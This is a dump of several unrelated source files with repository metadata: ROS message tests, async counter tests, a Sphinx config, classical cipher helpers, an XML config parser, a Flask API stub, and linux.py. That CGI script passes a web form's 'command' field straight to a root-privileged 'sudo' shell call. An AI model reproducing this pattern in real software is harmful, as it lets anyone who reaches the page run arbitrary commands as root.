] | 17 | 2020-03-13T00:10:28.000Z | 2021-09-06T17:13:17.000Z | msg/tools/genmsg/test/test_genmsg_msgs.py | sikuner/Firmware_Marine | 80411dc4eb5aa9dc8eb3ca8ff6d59d1cf081a010 | [
"BSD-3-Clause"
] | 1 | 2020-08-24T03:28:49.000Z | 2020-08-24T03:28:49.000Z | msg/tools/genmsg/test/test_genmsg_msgs.py | sikuner/Firmware_Marine | 80411dc4eb5aa9dc8eb3ca8ff6d59d1cf081a010 | [
"BSD-3-Clause"
] | 2 | 2020-03-13T09:05:32.000Z | 2021-08-13T08:28:14.000Z | # Software License Agreement (BSD License)
#
# Copyright (c) 2009, Willow Garage, Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following
# disclaimer in the documentation and/or other materials provided
# with the distribution.
# * Neither the name of Willow Garage, Inc. nor the names of its
# contributors may be used to endorse or promote products derived
# from this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
import os
import sys
import random
def test_bare_msg_type():
import genmsg.msgs
tests = [(None, None), ('String', 'String'), ('std_msgs/String', 'std_msgs/String'),
('String[10]', 'String'), ('string[10]', 'string'), ('std_msgs/String[10]', 'std_msgs/String'),
]
for val, res in tests:
assert res == genmsg.msgs.bare_msg_type(val)
PKG = 'genmsg'
def test_resolve_type():
from genmsg.msgs import resolve_type, bare_msg_type
for t in ['string', 'string[]', 'string[14]', 'int32', 'int32[]']:
bt = bare_msg_type(t)
t == resolve_type(t, PKG)
assert 'foo/string' == resolve_type('foo/string', PKG)
assert 'std_msgs/Header' == resolve_type('Header', 'roslib')
assert 'std_msgs/Header' == resolve_type('std_msgs/Header', 'roslib')
assert 'std_msgs/Header' == resolve_type('Header', 'stereo_msgs')
assert 'std_msgs/String' == resolve_type('String', 'std_msgs')
assert 'std_msgs/String' == resolve_type('std_msgs/String', 'std_msgs')
assert 'std_msgs/String' == resolve_type('std_msgs/String', PKG)
assert 'std_msgs/String[]' == resolve_type('std_msgs/String[]', PKG)
def test_parse_type():
import genmsg.msgs
tests = [
('a', ('a', False, None)),
('int8', ('int8', False, None)),
('std_msgs/String', ('std_msgs/String', False, None)),
('a[]', ('a', True, None)),
('int8[]', ('int8', True, None)),
('std_msgs/String[]', ('std_msgs/String', True, None)),
('a[1]', ('a', True, 1)),
('int8[1]', ('int8', True, 1)),
('std_msgs/String[1]', ('std_msgs/String', True, 1)),
('a[11]', ('a', True, 11)),
('int8[11]', ('int8', True, 11)),
('std_msgs/String[11]', ('std_msgs/String', True, 11)),
]
for val, res in tests:
assert res == genmsg.msgs.parse_type(val)
fail = ['a[1][2]', 'a[][]', '', None, 'a[', 'a[[1]', 'a[1]]']
for f in fail:
try:
genmsg.msgs.parse_type(f)
assert False, "should have failed on %s"%f
except ValueError as e:
pass
def test_Constant():
import genmsg.msgs
vals = [random.randint(0, 1000) for i in range(0, 3)]
type_, name, val = [str(x) for x in vals]
x = genmsg.msgs.Constant(type_, name, val, str(val))
assert type_ == x.type
assert name == x.name
assert val == x.val
assert x == genmsg.msgs.Constant(type_, name, val, str(val))
assert x != 1
assert not x == 1
assert x != genmsg.msgs.Constant('baz', name, val, str(val))
assert x != genmsg.msgs.Constant(type_, 'foo', val, str(val))
assert x != genmsg.msgs.Constant(type_, name, 'foo', 'foo')
# tripwire
assert repr(x)
assert str(x)
try:
genmsg.msgs.Constant(None, name, val, str(val))
assert False, "should have raised"
except: pass
try:
genmsg.msgs.Constant(type_, None, val, str(val))
assert False, "should have raised"
except: pass
try:
genmsg.msgs.Constant(type_, name, None, 'None')
assert False, "should have raised"
except: pass
try:
genmsg.msgs.Constant(type_, name, val, None)
assert False, "should have raised"
except: pass
try:
x.foo = 'bar'
assert False, 'Constant should not allow arbitrary attr assignment'
except: pass
def test_MsgSpec():
def sub_test_MsgSpec(types, names, constants, text, full_name, has_header):
m = MsgSpec(types, names, constants, text, full_name)
assert m.types == types
assert m.names == names
assert m.text == text
assert has_header == m.has_header()
assert m.constants == constants
assert list(zip(types, names)) == m.fields()
assert m == MsgSpec(types, names, constants, text, full_name)
return m
from genmsg import MsgSpec, InvalidMsgSpec
from genmsg.msgs import Field
# don't allow duplicate fields
try:
MsgSpec(['int32', 'int64'], ['x', 'x'], [], 'int32 x\nint64 x', 'x/DupFields')
assert False, "should have raised"
except InvalidMsgSpec:
pass
# don't allow invalid fields
try:
MsgSpec(['string['], ['x'], [], 'int32 x\nint64 x', 'x/InvalidFields')
assert False, "should have raised"
except InvalidMsgSpec:
pass
# allow empty msg
empty = sub_test_MsgSpec([], [], [], '', 'x/Nothing', False)
assert [] == empty.fields()
assert [] == empty.parsed_fields()
assert 'x/Nothing' == empty.full_name
assert 'x' == empty.package
assert 'Nothing' == empty.short_name
# one-field
one_field = sub_test_MsgSpec(['int32'], ['x'], [], 'int32 x', 'x/OneInt', False)
# make sure that equals tests every declared field
assert one_field == MsgSpec(['int32'], ['x'], [], 'int32 x', 'x/OneInt')
assert one_field != MsgSpec(['uint32'], ['x'], [], 'int32 x', 'x/OneInt')
assert one_field != MsgSpec(['int32'], ['y'], [], 'int32 x', 'x/OneInt')
assert one_field != MsgSpec(['int32'], ['x'], [], 'uint32 x', 'x/OneInt')
assert one_field != MsgSpec(['int32'], ['x'], [], 'int32 x', 'x/OneIntBad')
# test against __ne__ as well
assert one_field != MsgSpec(['int32'], ['x'], [], 'uint32 x', 'x/OneInt')
assert [Field('x', 'int32')] == one_field.parsed_fields(), "%s vs %s"%([Field('x', 'int32')], one_field.parsed_fields())
#test str
assert "int32 x" == str(one_field).strip()
# test variations of multiple fields and headers
two_fields = sub_test_MsgSpec(['int32', 'string'], ['x', 'str'], [], 'int32 x\nstring str', 'x/TwoFields', False)
assert [Field('x', 'int32'), Field('str', 'string')] == two_fields.parsed_fields()
one_header = sub_test_MsgSpec(['std_msgs/Header'], ['header'], [], 'Header header', 'x/OneHeader', True)
header_and_fields = sub_test_MsgSpec(['std_msgs/Header', 'int32', 'string'], ['header', 'x', 'str'], [], 'Header header\nint32 x\nstring str', 'x/HeaderAndFields', True)
embed_types = sub_test_MsgSpec(['std_msgs/Header', 'std_msgs/Int32', 'string'], ['header', 'x', 'str'], [], 'Header header\nstd_msgs/Int32 x\nstring str', 'x/EmbedTypes', True)
#test strify
assert "int32 x\nstring str" == str(two_fields).strip()
# types and names mismatch
try:
MsgSpec(['int32', 'int32'], ['intval'], [], 'int32 intval\int32 y', 'x/Mismatch')
assert False, "types and names must align"
except: pass
# test (not) equals against non msgspec
assert not (one_field == 1)
assert one_field != 1
# test constants
from genmsg.msgs import Constant
msgspec = MsgSpec(['int32'], ['x'], [Constant('int8', 'c', 1, '1')], 'int8 c=1\nuint32 x', 'x/Constants')
assert msgspec.constants == [Constant('int8', 'c', 1, '1')]
# tripwire
str(msgspec)
repr(msgspec)
# test that repr doesn't throw an error
[repr(x) for x in [empty, one_field, one_header, two_fields, embed_types]]
def test_Field():
from genmsg.msgs import Field
field = Field('foo', 'string')
assert field == Field('foo', 'string')
assert field != Field('bar', 'string')
assert field != Field('foo', 'int32')
assert field != 1
assert not field == 1
assert field.name == 'foo'
assert field.type == 'string'
assert field.base_type == 'string'
assert field.is_array == False
assert field.array_len == None
assert field.is_header == False
assert field.is_builtin == True
field = Field('foo', 'std_msgs/String')
assert field.type == 'std_msgs/String'
assert field.base_type == 'std_msgs/String'
assert field.is_array == False
assert field.array_len == None
assert field.is_header == False
assert field.is_builtin == False
field = Field('foo', 'std_msgs/String[5]')
assert field.type == 'std_msgs/String[5]'
assert field.base_type == 'std_msgs/String'
assert field.is_array == True
assert field.array_len == 5
assert field.is_header == False
assert field.is_builtin == False
field = Field('foo', 'std_msgs/String[]')
assert field.type == 'std_msgs/String[]'
assert field.base_type == 'std_msgs/String'
assert field.is_array == True
assert field.array_len == None
assert field.is_header == False
assert field.is_builtin == False
field = Field('foo', 'std_msgs/Header')
assert field.type == 'std_msgs/Header'
assert field.is_header == True
assert field.is_builtin == False
field = Field('foo', 'std_msgs/Header[]')
assert field.type == 'std_msgs/Header[]'
assert field.is_header == False
#tripwire
repr(field)
def test_is_valid_msg_type():
import genmsg.msgs
vals = [
#basic
'F', 'f', 'Foo', 'Foo1',
'std_msgs/String',
# arrays
'Foo[]', 'Foo[1]', 'Foo[10]',
]
for v in vals:
assert genmsg.msgs.is_valid_msg_type(v), "genmsg.msgs.is_valid_msg_type should have returned True for '%s'"%v
# bad cases
vals = [None, '', '#', '%', 'Foo%', 'Woo Woo',
'/', '/String',
'Foo[f]', 'Foo[1d]', 'Foo[-1]', 'Foo[1:10]', 'Foo[', 'Foo]', 'Foo[]Bar']
for v in vals:
assert not genmsg.msgs.is_valid_msg_type(v), "genmsg.msgs.is_valid_msg_type should have returned False for '%s'"%v
def test_is_valid_constant_type():
import genmsg.msgs
valid = ['int8', 'uint8', 'int16', 'uint16', 'int32', 'uint32', 'int64', \
'uint64', 'float32', 'float64', 'char', 'byte', 'string']
invalid = [
'std_msgs/String', '/', 'String',
'time', 'duration','header',
]
for v in valid:
assert genmsg.msgs.is_valid_constant_type(v), "genmsg.msgs.is_valid_constant_type should have returned True for '%s'"%v
for v in invalid:
assert not genmsg.msgs.is_valid_constant_type(v), "genmsg.msgs.is_valid_constant_type should have returned False for '%s'"%v
| 38.996656 | 180 | 0.620583 | 1,567 | 11,660 | 4.495852 | 0.178685 | 0.043719 | 0.055358 | 0.021718 | 0.473243 | 0.421718 | 0.394322 | 0.340099 | 0.295387 | 0.247693 | 0 | 0.019167 | 0.225901 | 11,660 | 298 | 181 | 39.127517 | 0.761356 | 0.165523 | 0 | 0.274882 | 0 | 0 | 0.235896 | 0.015292 | 0 | 0 | 0 | 0 | 0.445498 | 1 | 0.042654 | false | 0.042654 | 0.061611 | 0 | 0.109005 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7d56e588d7a6fdb0c64b6925b9b5823ebec11f36 | 4,547 | py | Python | tests/tests.py | arck1/aio-counter | ffff58bf14ca2f155be5a54c9385481fce5ee58c | [
"MIT"
] | null | null | null | tests/tests.py | arck1/aio-counter | ffff58bf14ca2f155be5a54c9385481fce5ee58c | [
"MIT"
] | null | null | null | tests/tests.py | arck1/aio-counter | ffff58bf14ca2f155be5a54c9385481fce5ee58c | [
"MIT"
] | null | null | null | import unittest
from asyncio import sleep
from async_unittest import TestCase
from aio_counter import AioCounter
from aio_counter.exceptions import AioCounterException
class TestAioCounter(TestCase):
TIK = float(0.3)
TAK = float(0.6)
TTL = int(1)
@classmethod
def setUpClass(cls) -> None:
super().setUpClass()
cls.counter = AioCounter(loop=cls.loop)
@classmethod
def tearDownClass(cls) -> None:
super().tearDownClass()
cls.counter.close()
def setUp(self) -> None:
self.counter._count = 0
self.counter._incs.clear()
self.counter._decs.clear()
# close all handlers
self.counter.close()
self.counter._handlers.clear()
def tearDown(self) -> None:
self.counter.close()
async def test_dec(self):
assert self.counter.empty()
self.counter._loop.call_later(self.TIK, self.counter.inc_nowait)
assert self.counter.count == 0
# wait until delayed inc_nowait increment counter
count = await self.counter.dec()
assert count == 0
async def test_inc(self):
assert self.counter.empty()
# fill counter
self.counter._count = self.counter.max_count
assert self.counter.count == self.counter.max_count
self.counter._loop.call_later(self.TIK, self.counter.dec_nowait)
assert self.counter.count == self.counter.max_count
# wait until delayed dec_nowait decrement counter
count = await self.counter.inc()
assert count == self.counter.max_count
def test_dec_nowait(self):
assert self.counter.empty()
try:
self.counter.dec_nowait()
except AioCounterException as e:
assert e
else:
assert False
count = self.counter.inc_nowait()
assert count == 1
assert self.counter.count == 1
count = self.counter.dec_nowait()
assert count == 0
assert self.counter.count == 0
def test_inc_nowait(self):
assert self.counter.empty()
count = self.counter.inc_nowait()
assert count == 1
assert self.counter.count == 1
# fill counter
self.counter._count = self.counter.max_count
try:
self.counter.inc_nowait()
except AioCounterException as e:
assert e
else:
assert False
async def test_ttl_inc(self):
assert self.counter.empty()
# inc with ttl = TTL
await self.counter.inc(self.TTL)
assert self.counter.count == 1
# sleep and inc() should run in one loop
await sleep(self.TTL, loop=self.loop)
# check if count was dec
assert self.counter.count == 0
async def test_bulk_inc(self):
"""
inc() with value > 1 should success only if counter changed to <value > 1> in one moment
:return:
"""
assert self.counter.empty()
# fill counter
self.counter._count = self.counter.max_count - 1
assert self.counter.count == self.counter.max_count - 1
def delayed_check(counter):
assert counter.count == counter.max_count - 1
self.counter._loop.call_later(self.TIK, delayed_check, self.counter)
self.counter._loop.call_later(self.TTL, self.counter.dec_nowait)
assert self.counter.count == self.counter.max_count - 1
await self.counter.inc(value=2)
assert self.counter.count == self.counter.max_count
async def test_bulk_dec(self):
"""
dec() with value > 1 should success only if counter changed to <value > 1> in one moment
:return:
"""
assert self.counter.empty()
await self.counter.inc()
assert self.counter.count == 1
def delayed_check(counter):
assert counter.count == 1
self.counter._loop.call_later(self.TIK, delayed_check, self.counter)
self.counter._loop.call_later(self.TTL, self.counter.inc_nowait)
assert self.counter.count == 1
await self.counter.dec(value=2)
assert self.counter.empty()
async def test_ttl_after_dec(self):
assert self.counter.empty()
await self.counter.inc(self.TTL)
assert self.counter.count == 1
count = self.counter.dec_nowait()
assert count == 0
assert self.counter.count == 0
await sleep(self.TTL, loop=self.loop)
if __name__ == '__main__':
unittest.main()
| 25.544944 | 96 | 0.61667 | 569 | 4,547 | 4.803163 | 0.147627 | 0.269667 | 0.149287 | 0.120746 | 0.69667 | 0.615441 | 0.565679 | 0.544457 | 0.4764 | 0.387486 | 0 | 0.009861 | 0.286343 | 4,547 | 177 | 97 | 25.689266 | 0.832357 | 0.051463 | 0 | 0.553398 | 0 | 0 | 0.001978 | 0 | 0 | 0 | 0 | 0 | 0.349515 | 1 | 0.07767 | false | 0 | 0.048544 | 0 | 0.165049 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7d68c3cd5ebdfbe4a4f33c56583ea1d144745710 | 915 | py | Python | chess/pythonchess/docs/conf.py | mahakbansal/ChessAlphaZero | 2b3f823fdc252d7fd32de0b5e4e53aece9082dd5 | [
"MIT"
] | 2 | 2021-02-22T21:53:58.000Z | 2021-04-03T16:40:52.000Z | chess/pythonchess/docs/conf.py | mahakbansal/ChessAlphaZero | 2b3f823fdc252d7fd32de0b5e4e53aece9082dd5 | [
"MIT"
] | 1 | 2018-09-26T03:38:57.000Z | 2018-09-26T03:38:57.000Z | chess/pythonchess/docs/conf.py | mahakbansal/ChessAlphaZero | 2b3f823fdc252d7fd32de0b5e4e53aece9082dd5 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
import sys
import os
# Import the chess module.
sys.path.insert(0, os.path.abspath('..'))
import chess
# Autodoc.
extensions = ["sphinx.ext.autodoc"]
autodoc_member_order = 'bysource'
# The suffix of source filenames.
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# General information about the project.
project = "python-chess"
copyright = "2014–2018, Niklas Fiekas"
# The version.
version = chess.__version__
release = chess.__version__
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ["_build"]
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = "sphinx"
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = "default"
| 22.875 | 74 | 0.747541 | 128 | 915 | 5.1875 | 0.617188 | 0.036145 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.012953 | 0.156284 | 915 | 39 | 75 | 23.461538 | 0.845855 | 0.491803 | 0 | 0 | 0 | 0 | 0.20354 | 0 | 0 | 0 | 0 | 0.025641 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7d8c2a23670b05afd3505faf37ad0aff75f308fd | 5,073 | py | Python | vcommand/libs/crypto.py | virink/vCommand | 328dd5a8bc9390c5edde80f5544d797f54690f91 | [
"MIT"
] | 7 | 2019-08-01T14:57:34.000Z | 2019-11-26T12:12:17.000Z | vcommand/libs/crypto.py | virink/vCommand | 328dd5a8bc9390c5edde80f5544d797f54690f91 | [
"MIT"
] | null | null | null | vcommand/libs/crypto.py | virink/vCommand | 328dd5a8bc9390c5edde80f5544d797f54690f91 | [
"MIT"
] | 2 | 2019-08-16T04:52:50.000Z | 2019-11-26T12:12:25.000Z | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
"""
Author : Virink <virink@outlook.com>
Date : 2019/04/18, 14:49
"""
import string
import re
L = string.ascii_lowercase
U = string.ascii_uppercase
A = string.ascii_letters
def func_atbash(*args):
"""埃特巴什码解码"""
arg = args[0]
arg = arg.lower().replace(' ', 'vvvzzzvvv')
res = [L[25 - j] for i in arg for j in range(26) if i == L[j]]
return ''.join(res).replace('eeeaaaeee', ' ')
def __caesar(offset, arg):
"""凯撒编码 : 内部调用"""
result = ""
for ch in arg:
if ch.isupper():
result += U[((U.index(ch) + offset) % 26)]
elif ch.islower():
result += L[((L.index(ch) + offset) % 26)]
elif ch.isdigit():
result += ch
else:
result += ch
return result
def func_caesar(*args):
"""凯撒编码"""
res = []
for offset in range(26):
res.append("[+] offset : %d\tresult : %s" %
(offset, __caesar(offset, args[0])))
return "\r\n".join(res)
def func_rot13(*args):
"""rot13"""
return __caesar(13, args[0])
def func_mpkc(*args):
"""手机键盘编码 Mobile Phone Keyboard Cipher"""
T = {
'A': 21, 'B': 22, 'C': 23, 'D': 31, 'E': 32, 'F': 33,
'G': 41, 'H': 42, 'I': 43, 'J': 51, 'K': 52, 'L': 53,
'M': 61, 'N': 62, 'O': 63, 'P': 71, 'Q': 72, 'R': 73, 'S': 74,
'T': 81, 'U': 82, 'V': 83, 'W': 91, 'X': 92, 'Y': 93, 'Z': 94
}
arg = args[0].upper()
if arg[0] in U:
return ','.join([str(T.get(i, i)) for i in arg])
else:
T = {str(T[k]): k for k in T}
if ',' in arg:
arg = arg.split(',')
elif ' ' in arg:
arg = arg.split(' ')
return ''.join([T.get(i, i) for i in arg])
def func_morse(*args):
"""摩斯电码"""
T = {
'A': '.-', 'B': '-...', 'C': '-.-.',
'D': '-..', 'E': '.', 'F': '..-.',
'G': '--.', 'H': '....', 'I': '..',
'J': '.---', 'K': '-.-', 'L': '.-..',
'M': '--', 'N': '-.', 'O': '---',
'P': '.--.', 'Q': '--.-', 'R': '.-.',
'S': '...', 'T': '-', 'U': '..-',
'V': '...-', 'W': '.--', 'X': '-..-',
'Y': '-.--', 'Z': '--..',
'0': '-----', '1': '.----', '2': '..---',
'3': '...--', '4': '....-', '5': '.....',
'6': '-....', '7': '--...', '8': '---..',
'9': '----.',
',': '--..--', '.': '.-.-.-', ':': '---...', ';': '-.-.-.',
'?': '..--..', '=': '-...-', "'": '.----.', '/': '-..-.',
'!': '-.-.--', '-': '-....-', '_': '..--.-', '(': '-.--.',
')': '-.--.-', '$': '...-..-', '&': '. . . .', '@': '.--.-.',
'{': '----.--', '}': '-----.-'
}
arg = args[0]
if re.match(r'^[\.\-\/ ]+$', arg):
T = {str(T[k]): k for k in T}
if len(args) > 1:
arg = ' '.join(args)
arg = arg.replace('/', ' ').split(' ')
# TODO: morse auto decode when it is not sep
# p = 0
# res = ''
# d = 5
# while p < (len(arg)+7) and d > 0:
# print("[D] len : %d p : %d" % (len(arg), p))
# for j in [6, 5, 4, 3, 2, 1, 0]:
# tmp = T.get(arg[p:p+j], None)
# print("[D] tmp = arg[%d:%s] = %s => %s" %
# (p, j, arg[p:p+j], tmp))
# if tmp:
# p = p+j
# res += tmp
# break
# # p = p+j-1
# # break
# d -= 1
# print("[D] Result : %s" % res)
return ''.join([T.get(i) for i in arg])
else:
return '/'.join([str(T.get(i, '?')) for i in arg.upper()])
def func_peigen(*args):
"""培根密码"""
T = {
'H': 'aabbb', 'G': 'aabba', 'R': 'baaab', 'Q': 'baaaa',
'Z': 'bbaab', 'Y': 'bbaaa', 'N': 'abbab', 'M': 'abbaa',
'U': 'babaa', 'V': 'babab', 'I': 'abaaa', 'J': 'abaab',
'F': 'aabab', 'E': 'aabaa', 'A': 'aaaaa', 'B': 'aaaab',
'T': 'baabb', 'S': 'baaba', 'C': 'aaaba', 'D': 'aaabb',
'P': 'abbbb', 'O': 'abbba', 'K': 'ababa', 'L': 'ababb',
'W': 'babba', 'X': 'babbb'
}
arg = args[0]
if re.match(r'^[ab]+$', arg):
T = {str(T[k]): k for k in T}
return ''.join([T.get(arg[i:i+5]) for i in range(0, len(arg), 5)])
else:
return ''.join([T.get(i.upper()) for i in arg])
def __vigenere(s, key='virink', de=0):
"""维吉利亚密码"""
s = str(s).replace(" ", "").upper()
key = str(key).replace(" ", "").upper()
res = ''
i = 0
while i < len(s):
j = i % len(key)
k = U.index(key[j])
m = U.index(s[i])
if de:
if m < k:
m += 26
res += U[m - k]
else:
res += U[(m + k) % 26]
i += 1
return res
def func_vigenere(*args):
"""维吉利亚密码"""
if len(args) < 2:
return '[-] Vigenere Usage : command key text [isdecode]'
return __vigenere(args[1], args[0], 1 if len(args) >= 3 else 0)
| 30.196429 | 74 | 0.350089 | 628 | 5,073 | 2.794586 | 0.294586 | 0.025641 | 0.023932 | 0.030769 | 0.173219 | 0.126496 | 0.083191 | 0.046724 | 0.02963 | 0.02963 | 0 | 0.039138 | 0.350286 | 5,073 | 167 | 75 | 30.377246 | 0.493325 | 0.130298 | 0 | 0.140351 | 0 | 0 | 0.142032 | 0 | 0 | 0 | 0 | 0.005988 | 0 | 1 | 0.078947 | false | 0 | 0.017544 | 0 | 0.210526 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7daef8b7f43d19ad4b4a4241d53911344a3bad74 | 675 | py | Python | ABNOOrchestrator/ABNOParameters.py | HPNLAB/ABNO-FUTEBOL | 3a1dbee11abd9a808d337a6bbdccba052671d33c | [
"Apache-2.0"
] | null | null | null | ABNOOrchestrator/ABNOParameters.py | HPNLAB/ABNO-FUTEBOL | 3a1dbee11abd9a808d337a6bbdccba052671d33c | [
"Apache-2.0"
] | null | null | null | ABNOOrchestrator/ABNOParameters.py | HPNLAB/ABNO-FUTEBOL | 3a1dbee11abd9a808d337a6bbdccba052671d33c | [
"Apache-2.0"
] | null | null | null | __author__ = 'alejandroaguado'
from xml.etree import ElementTree
class ABNOParameters:
def __init__(self, filename):
self.document = ElementTree.parse(filename)
root = self.document.getroot()
tag = self.document.find('abnoconfig')
self.address=tag.attrib['address']
self.port = int(tag.attrib['port'])
tag = self.document.find('pceconfig')
self.pceaddress = tag.attrib['address']
self.pceport = int(tag.attrib['port'])
tag = self.document.find('pmconfig')
self.pmaddress = tag.attrib['address']
self.pmport = int(tag.attrib['port'])
#tag = self.document.find('properties') | 35.526316 | 51 | 0.638519 | 75 | 675 | 5.64 | 0.413333 | 0.170213 | 0.141844 | 0.179669 | 0.248227 | 0.248227 | 0.248227 | 0.248227 | 0 | 0 | 0 | 0 | 0.219259 | 675 | 19 | 52 | 35.526316 | 0.802657 | 0.056296 | 0 | 0 | 0 | 0 | 0.117739 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.066667 | false | 0 | 0.066667 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7dafc11fd8fb86ab44db99cb63fe8f3a5c118843 | 277 | py | Python | influencer-detection/src/api/influencers/api/v1.py | luisblazquezm/influencer-detection | bd8aec83cbd8e5fbb3231824b5e274c47f491501 | [
"Apache-2.0"
] | 4 | 2021-05-22T16:33:41.000Z | 2021-11-22T23:44:40.000Z | influencer-detection/src/api/influencers/api/v1.py | Alburrito/influencer-detection | bd8aec83cbd8e5fbb3231824b5e274c47f491501 | [
"Apache-2.0"
] | null | null | null | influencer-detection/src/api/influencers/api/v1.py | Alburrito/influencer-detection | bd8aec83cbd8e5fbb3231824b5e274c47f491501 | [
"Apache-2.0"
] | 2 | 2021-05-21T16:34:14.000Z | 2021-09-29T12:59:49.000Z | #!flask/bin/python
# Copyright 2021 Luis Blazquez Miñambres (@luisblazquezm)
# See LICENSE for details.
from flask_restx import Api
api = Api(version='1.0',
title='Influencer Detection Project',
description="**PORBI Influencer Detection project's Flask RESTX API**") | 27.7 | 75 | 0.747292 | 36 | 277 | 5.722222 | 0.75 | 0.097087 | 0.252427 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.025316 | 0.144404 | 277 | 10 | 75 | 27.7 | 0.843882 | 0.353791 | 0 | 0 | 0 | 0 | 0.491525 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.25 | 0 | 0.25 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
7db6acccc13d73c452c9d80805e389c51f138158 | 346 | py | Python | Backend/linux.py | TheInvincibleLearner/simranquirky.github.io | 21a2524b321493b9ff82eb8b4fcc10af8f8face7 | [
"MIT"
] | null | null | null | Backend/linux.py | TheInvincibleLearner/simranquirky.github.io | 21a2524b321493b9ff82eb8b4fcc10af8f8face7 | [
"MIT"
] | 10 | 2021-09-29T13:25:21.000Z | 2021-10-05T13:51:36.000Z | Backend/linux.py | TheInvincibleLearner/simranquirky.github.io | 21a2524b321493b9ff82eb8b4fcc10af8f8face7 | [
"MIT"
] | 7 | 2021-09-22T13:26:35.000Z | 2021-10-05T03:07:43.000Z | #!/usr/bin/python3
print("content-type: text/html")
print()
import subprocess as sp
import cgi
fs = cgi.FieldStorage()
cmd = fs.getvalue("command")
output = sp.getoutput("sudo "+cmd)
print("<body style='padding: 40px;'>")
print('<h1 style="color:#df405a;" >Output</h1>')
print("<pre>{}</pre>".format(output))
print("</body>")
| 20.352941 | 49 | 0.635838 | 46 | 346 | 4.782609 | 0.652174 | 0.081818 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.026846 | 0.138728 | 346 | 16 | 50 | 21.625 | 0.711409 | 0.049133 | 0 | 0 | 0 | 0 | 0.394231 | 0.070513 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.181818 | 0 | 0.181818 | 0.545455 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 |
7dbf4c0c61fb56b588d550f32b9ba42ac0a71e93 | 3,506 | py | Python | Thirdparty/libpsd/build.py | stinvi/dava.engine | 2b396ca49cdf10cdc98ad8a9ffcf7768a05e285e | [
"BSD-3-Clause"
] | 26 | 2018-09-03T08:48:22.000Z | 2022-02-14T05:14:50.000Z | Thirdparty/libpsd/build.py | ANHELL-blitz/dava.engine | ed83624326f000866e29166c7f4cccfed1bb41d4 | [
"BSD-3-Clause"
